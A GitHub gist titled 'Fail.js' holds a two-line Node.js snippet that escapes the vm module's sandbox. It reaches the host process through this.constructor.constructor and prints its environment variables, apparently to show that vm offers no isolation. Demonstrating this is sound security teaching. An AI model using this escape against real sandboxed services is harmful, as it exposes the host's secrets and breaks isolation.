Skip to content

Instantly share code, notes, and snippets.

@lazorfuzz
Created August 16, 2019 08:25
Show Gist options
  • Select an option

  • Save lazorfuzz/8f2615522fc059a5f3ea64cc51bec5ec to your computer and use it in GitHub Desktop.

Select an option

Save lazorfuzz/8f2615522fc059a5f3ea64cc51bec5ec to your computer and use it in GitHub Desktop.
Fail.js
const vm = require('vm');
console.log(vm.runInNewContext('this.constructor.constructor("return process")().env'));
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment